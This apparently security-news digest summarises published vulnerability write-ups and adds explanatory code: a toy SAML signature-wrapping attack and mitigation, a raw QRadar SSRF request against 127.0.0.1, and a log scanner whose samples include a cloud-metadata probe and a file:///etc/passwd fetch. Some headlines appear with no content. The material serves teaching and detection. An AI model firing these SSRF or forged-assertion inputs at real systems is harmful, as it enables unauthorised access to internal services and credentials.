Site-wide CSRF using the GraphQL API
SAML is insecure by design
👤 by @joonas_fi

"In summary: once you base your security on some computed property, you can now exploit any flaws, differences or ambiguity in this computation. The more complex the computation is, the more dangerous it gets."

📝 Contents:
• What is SAML?
• Why should I care?
• Why is SAML insecure?
• Why is signing computed values dangerous?
• The SAML vulnerability in practice
• Why is SAML this way?
• Vulnerability mitigation
• How could SAML have been designed better?
• More SAML weirdness
• Why is SAML used if it sucks?
• Action
• Ignorance is bliss
• Additional reading

https://joonas.fi/2021/08/saml-is-insecure-by-design/
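The quoted sentence above is the signature-wrapping problem in one line: the verifier checks a signature over one computed view of the document (the element a reference ID points at, after canonicalisation) while the application reads another (the first assertion it finds). As an added toy illustration, not code from the linked article, the Python below signs one assertion, then shows a consumer that verifies the signature correctly and still trusts an unsigned assertion an attacker slid in front of it, next to a consumer that refuses the ambiguity. The HMAC stands in for the XML-DSig RSA signature, `canonical()` for XML canonicalisation, the key is constructed, and the element names are a simplified SAML-like layout without namespaces; all of that is assumption for the sake of the demo.

```python
import copy
import hashlib
import hmac
import xml.etree.ElementTree as ET
from typing import Optional

IDP_KEY = b"idp-signing-key"  # constructed stand-in for the IdP's private key


def canonical(elem: ET.Element) -> bytes:
    """Stand-in for XML canonicalisation: the element serialised on its own,
    independent of where it sits in the document."""
    clone = copy.deepcopy(elem)
    clone.tail = None
    return ET.tostring(clone, encoding="unicode").encode("utf-8")


def signature_value(elem: ET.Element) -> str:
    # HMAC stand-in for the RSA signature over the canonicalised reference.
    return hmac.new(IDP_KEY, canonical(elem), hashlib.sha256).hexdigest()


def build_response(subject: str, assertion_id: str = "_a1") -> str:
    """What the IdP emits: one assertion plus a detached signature that
    refers to it by ID (simplified SAML-like layout, no namespaces)."""
    root = ET.Element("Response")
    assertion = ET.SubElement(root, "Assertion", ID=assertion_id)
    ET.SubElement(assertion, "Subject").text = subject
    sig = ET.SubElement(root, "Signature", Ref=assertion_id)
    sig.text = signature_value(assertion)
    return ET.tostring(root, encoding="unicode")


def assertions_with_id(root: ET.Element, ref: str):
    return [a for a in root.iter("Assertion") if a.get("ID") == ref]


def verify_signature(xml_text: str) -> bool:
    """Signature check as a library would do it: resolve the reference ID,
    canonicalise that element, compare the digest."""
    root = ET.fromstring(xml_text)
    sig = root.find("Signature")
    if sig is None:
        return False
    targets = assertions_with_id(root, sig.get("Ref", ""))
    if len(targets) != 1:
        return False
    return hmac.compare_digest(signature_value(targets[0]), sig.text or "")


def naive_subject(xml_text: str) -> Optional[str]:
    """Consumer that asks 'is the document signed?' and then reads 'the'
    assertion: two different computations over the same bytes."""
    if not verify_signature(xml_text):
        return None
    root = ET.fromstring(xml_text)
    return root.find(".//Assertion/Subject").text


def strict_subject(xml_text: str) -> Optional[str]:
    """Consumer that only ever reads the element the signature covers and
    refuses documents where that choice is ambiguous."""
    root = ET.fromstring(xml_text)
    if len(list(root.iter("Assertion"))) != 1 or not verify_signature(xml_text):
        return None
    sig = root.find("Signature")
    return assertions_with_id(root, sig.get("Ref", ""))[0].find("Subject").text


def wrap(signed_xml: str, attacker_subject: str) -> str:
    """Signature wrapping: keep the genuine, signed assertion intact (so the
    signature still verifies) but move it aside and put an unsigned one
    where a naive consumer looks first."""
    root = ET.fromstring(signed_xml)
    genuine = root.find("Assertion")
    root.remove(genuine)
    forged = ET.Element("Assertion", ID="_forged")
    ET.SubElement(forged, "Subject").text = attacker_subject
    root.insert(0, forged)
    ET.SubElement(root, "Extensions").append(genuine)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    signed = build_response("alice")
    attack = wrap(signed, "admin")
    print("signature verifies on wrapped doc:", verify_signature(attack))
    print("naive consumer logs in as:", naive_subject(attack))
    print("strict consumer logs in as:", strict_subject(attack))
```

The strict consumer is the shape of the usual mitigation: count assertions, read only the node the signature reference resolves to, and reject anything else. Real XML-DSig adds more computed steps (transforms, canonicalisation algorithms, ID attribute lookup rules), each of which is another place for the verifier's view and the consumer's view to diverge.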
✍️We would like to share with the community some uncommon but not unique cases from our experience. Let us know if you like this format.

Stored XSS using .xbl files.
NTLM relaying to AD CS - On certificates, printers and a little hippo
👤 by @_dirkjan

More Active Directory NTLM relaying wizardry from Dirk-jan, this time aggregating and unifying multiple different tools and techniques, culminating in the release of PKINITtools.

📝 Contents:
• Background - the state of NTLM relaying
• Exploring AD CS relaying
• Abusing the obtained certificate - diving into PKINIT
• Obtaining the NT hash of the impersonated computer account
• Using S4U2Self to obtain access to the relayed machine
• Other abuse avenues of PetitPotam
• Defenses
• Credits / Thanks / Tools

https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/
You should turn off autofill in your password manager
👤 by @marektoth

11 of the 16 tested browser and password manager combinations, using default configurations and adhering to best practices, could be compromised in one mouse click by the user, allowing attackers access to plain-text saved login credentials.

📝 Contents:
• Autofill
• Autofill in chromium-based browsers
• Abuse of the autofill? Cross-Site Scripting (XSS)
• Analysis of browsers and password managers
• Limitation
• Script and demo
• Clickjacking KeePassXC-Browser
• Potential risks for users
• Potential risks for companies / Recommendation for InfoSec
• Recommendation
• Conclusion

https://marektoth.com/blog/password-managers-autofill/
Cisco fixed a Post-Auth RCE (CVE-2021-1518) in Firepower Device Manager found by our researchers Nikita Abramov and Mikhail Klyuchnikov.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fdm-rce-Rx6vVurq
Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909)
👤 by Bharat Jogi

"The Qualys Research Team has discovered a size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems. Any unprivileged user can gain root privileges on a vulnerable host by exploiting this vulnerability in a default configuration."

📝 Contents:
• About Linux Filesystem
• Impact
• Disclosure Timeline
• Proof of Concept Video
• Technical Details
• Solution
• Qualys Coverage
• Dashboard
• Vendor References
• Frequently Asked Questions (FAQs)

https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909
CVE-2021-28474: SHAREPOINT RCE VIA SERVER-SIDE CONTROL INTERPRETATION CONFLICT
👤 by @thezdi

The vulnerability allows authenticated users to execute arbitrary .NET code on the server in the context of the service account of the SharePoint web application. By default, authenticated SharePoint users have all necessary permissions.

📝 Contents:
• The Vulnerability
• Exploitation
• Proof of Concept
• Getting Remote Code Execution
• Conclusion

https://www.zerodayinitiative.com/blog/2021/7/7/cve-2021-28474-sharepoint-remote-code-execution-via-server-side-control-interpretation-conflict
PoC for SSRF in IBM QRadar SIEM (CVE-2020-4786)

GET /console/chartServer?output=image&data=http://127.0.0.1:8080
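As an added example, not part of the advisory or the PoC above, the Python below turns that request shape into a detection check over web-server access-log lines: it parses the request target, pulls every `data` parameter sent to `/console/chartServer`, and flags values that ask the server to fetch loopback, link-local (cloud metadata), private or non-HTTP destinations. The log layout and the sample lines are constructed for the example; only literal IP addresses are classified, since a DNS name can still resolve inward and that case is better caught by egress monitoring on the host.

```python
import ipaddress
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

VULN_PATH = "/console/chartServer"

# Common-log-format-like access log line (assumed layout, not QRadar's own).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample lines: a loopback probe, a percent-encoded metadata
# probe, a legitimate external chart source, an unrelated request, and a
# non-http scheme.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jul/2021:10:01:02 +0000] "GET /console/chartServer?output=image&data=http://127.0.0.1:8080 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jul/2021:10:01:09 +0000] "GET /console/chartServer?output=image&data=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 1033',
    '198.51.100.7 - - [10/Jul/2021:10:02:30 +0000] "GET /console/chartServer?output=image&data=https://reports.example.com/q.json HTTP/1.1" 200 2048',
    '198.51.100.7 - - [10/Jul/2021:10:02:31 +0000] "GET /console/logon.jsp HTTP/1.1" 200 4096',
    '203.0.113.5 - - [10/Jul/2021:10:03:00 +0000] "GET /console/chartServer?output=image&data=file:///etc/passwd HTTP/1.1" 500 0',
]


def internal_reason(url: str) -> Optional[str]:
    """Why `url` is a suspicious target for a server-side fetch, or None.
    DNS names are left alone here, and shorthand IPv4 forms such as 127.1
    or 0x7f000001 are not normalised; both are known gaps of this check."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return f"non-http scheme {parts.scheme!r}"
    host = parts.hostname
    if not host:
        return "missing host"
    if host == "localhost" or host.endswith(".localhost"):
        return "loopback name"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None  # a DNS name; resolution is out of scope for this check
    if ip.is_loopback:
        return "loopback address"
    if ip.is_link_local:
        return "link-local address (cloud metadata range)"
    if ip.is_private:
        return "private address"
    if ip.is_unspecified:
        return "unspecified address"
    return None


def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(source, data URL, reason) for every chartServer request whose data=
    parameter points somewhere a server should not be asked to fetch."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        target = urlsplit(m["target"])
        if target.path != VULN_PATH:
            continue
        for data_url in parse_qs(target.query).get("data", []):
            reason = internal_reason(data_url)
            if reason is not None:
                hits.append((m["src"], data_url, reason))
    return hits


if __name__ == "__main__":
    for src, url, reason in scan_log(SAMPLE_LOG):
        print(f"{src} -> {url}: {reason}")
```

Because `parse_qs` decodes percent-encoding, the encoded metadata probe is caught the same way as the plain one; a rule that only pattern-matched the raw line for `127.0.0.1` would miss it.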
RARLAB fixed a MITM (CVE-2021-35052) in WinRAR found by our researcher Igor Sak-Sakovskiy.

This attack could be leveraged to achieve code execution on a user's machine.

Advisory: https://win-rar.com/singlenewsview.html?L=0&tx_ttnews%5Btt_news%5D=165&cHash=1
